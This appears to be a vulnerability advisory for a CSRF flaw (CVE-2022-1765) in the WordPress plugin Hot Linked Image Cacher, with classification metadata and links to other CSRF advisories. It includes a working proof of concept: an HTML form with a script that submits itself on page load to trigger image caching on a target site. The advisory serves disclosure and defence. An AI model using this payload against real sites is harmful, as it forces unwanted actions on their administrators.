Hot Linked Image Cacher <= 1.16 – Image upload/cache abuse via CSRF | CVE 2022-1765 | Plugin Vulnerabilities

Description

The plugin is vulnerable to CSRF. This can be used to store / cache images from external domains on the server, which could lead to legal risks (due to copyright violations or licensing rules).

Proof of Concept

<form id="test" action="https://example.com/wp-admin/tools.php?page=hot-linked-image-cacher%2Fhotlinked-image-cacher.php" method="POST">
    <input type="text" name="domains[]" value="example.com">
    <input type="text" name="urlmethod" value="curl">
    <input type="text" name="postid" value="enter a post id here">
    <input type="text" name="step" value="3">
    <input type="text" name="Submit" value="Cache These Images »">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

hot-linked-image-cacher

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

b50e7622-c1dc-485b-a5f5-b010b40eef20

Timeline

Publicly Published

2022-05-17 (about 3 years ago)

Added

2022-05-17 (about 3 years ago)

Last Updated

2022-05-18 (about 3 years ago)

Other

Published

Title

Published

2025-04-01

Title

Easy!Appointments <= 1.4.2 - Cross-Site Request Forgery to Settings Update

Published

2024-09-30

Title

CartBounty – Save and recover abandoned carts for WooCommerce < 8.2.1 - Cross-Site Request Forgery

Published

2021-10-28

Title

URL Shortify < 1.5.1 - Arbitrary Link/Group Deletion via CSRF

Published

2020-09-16

Title

Feed Them Social < 2.8.7 - Cross-Site Request Forgery

Published

2021-06-21

Title

Remove Schema < 1.6 - Cross-Site Request Forgery